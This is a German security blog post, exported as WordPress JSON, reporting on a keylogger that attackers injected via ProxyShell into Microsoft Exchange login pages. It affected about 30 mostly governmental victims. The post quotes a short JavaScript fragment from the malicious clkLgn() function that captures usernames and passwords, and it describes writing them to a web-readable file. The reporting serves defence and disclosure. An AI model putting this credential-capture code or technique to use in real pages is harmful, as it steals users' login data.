{"id":295474,"date":"2024-05-22T00:01:00","date_gmt":"2024-05-21T22:01:00","guid":{"rendered":"https:\/\/www.borncity.com\/blog\/?p=295474"},"modified":"2024-05-21T23:26:23","modified_gmt":"2024-05-21T21:26:23","slug":"microsoft-exchange-server-keylogger-infiziert-regierungsorganisationen-weltweit","status":"publish","type":"post","link":"https:\/\/borncity.com\/blog\/2024\/05\/22\/microsoft-exchange-server-keylogger-infiziert-regierungsorganisationen-weltweit\/","title":{"rendered":"Microsoft Exchange Server: Keylogger infiziert Regierungsorganisationen weltweit"},"content":{"rendered":"

\"Sicherheit[English<\/a>]Sicherheitsforscher sind auf einen Keylogger gesto\u00dfen, der weltweit Regierungsorganisation, aber auch Banken oder andere Institutionen \u00fcber Microsoft Exchange Server infiziert. Der Keylogger wurde nach einer Infektion auf der Hauptseite des des Exchange Server eines Kunden gefunden. Zweck dieses Keyloggers ist es, Anmeldedaten zu stehlen und an einen Remote-Server zu \u00fcbertragen. Es sind weltweit bereits um die 30 infizierte Systeme gefunden worden.<\/p>\n

<\/p>\n

Microsoft Exchange Server unter Beschuss<\/h2>\n

\"\"Sicherheitsforscher des Incident Response Teams des Positive Technologies Expert Security Center (PT ESC) sind bei der forensischen Analyse eines Cybervorfalls auf einen bisher unbekannten Keylogger gesto\u00dfen. Dieser war in die Hauptseite von Microsoft Exchange Server des Kunden eingebettet. Die Daten der Sicherheitsforscher zufolge fand die erste Kompromittierung im Jahr 2021 statt.<\/p>\n

\"Keylogger<\/a><\/p>\n

Ich bin \u00fcber obigen Tweet auf das Thema, welches die Sicherheitsforscher im Artikel Positive Technologies detects a series of attacks via Microsoft Exchange Server<\/a> dokumentiert haben, gesto\u00dfen. Dieser Keylogger sammelte die Anmeldedaten des Kontos in einer Datei, die \u00fcber einen speziellen Pfad aus dem Internet zug\u00e4nglich war. Das Team identifizierte \u00fcber 30 Opfer, von denen die meisten zu Regierungsbeh\u00f6rden in verschiedenen L\u00e4ndern geh\u00f6ren. Ohne zus\u00e4tzliche Daten k\u00f6nnen die Sicherheitsforscher diese Angriffe nicht einer bestimmten Gruppe zuordnen, schreiben sie, stellen aber fest, dass sich die meisten Opfer in Afrika und im Nahen Osten befinden.<\/p>\n

Der Schadcode in Exchange Server<\/h2>\n

Um den Keylogger einzuschleusen, nutzten die Hacker ProxyShell, eine bekannte Schwachstelle in Microsoft Exchange Server. Als N\u00e4chstes f\u00fcgten sie den Keylogger-Code in die Hauptseite des Servers ein. Auf den infizierten Microsoft Exchange Server-Systemen war der nachfolgende Schadcode in der Hauptseite, insbesondere in die Funktion clkLgn()<\/em>, eingebettet.<\/p>\n

var ObjectData = \"ObjectType=\" + escape(curTime + \"\\t\" + \r\ngbid(\"username\").value + \"\\t\" + gbid(\"password\").value) + \r\n\"&uin=\" + Math.random().toString(16).substring(2);<\/pre>\n
Der in obigem Tweet gezeigte Screenshot zeigt den eingebetteten Code. Au\u00dferdem f\u00fcgten die Hacker in die Datei logon.aspx<\/em> Code ein, der das Ergebnis des Keyloggers – sprich die Anmeldedaten des Kontos\u00a0 in eine Datei umleitet. Diese Datei war \u00fcber einen speziellen Pfad per Internet lesbar, so dass die Angreifer jederzeit die Informationen, die der Keylogger gesammelt hatte, abrufen konnten. Auf diese Weise gelangten die Angreifer an die Anmeldedaten verschiedener Exchange Server-Systeme.<\/p>\n
Die Sicherheitsforscher haben inzwischen \u00fcber 30 Opfer identifiziert und benachrichtigt. Es handelt sich vor allem um Regierungsbeh\u00f6rden aus verschiedenen L\u00e4ndern. Die Liste der Opfer umfasst aber auch Banken, IT-Unternehmen und Bildungseinrichtungen. Zu den von diesen Angriffen betroffenen L\u00e4ndern geh\u00f6ren Russland, die Vereinigten Arabischen Emirate, Kuwait, Oman, Niger, Nigeria, \u00c4thiopien, Mauritius, Jordanien und der Libanon.<\/p>\n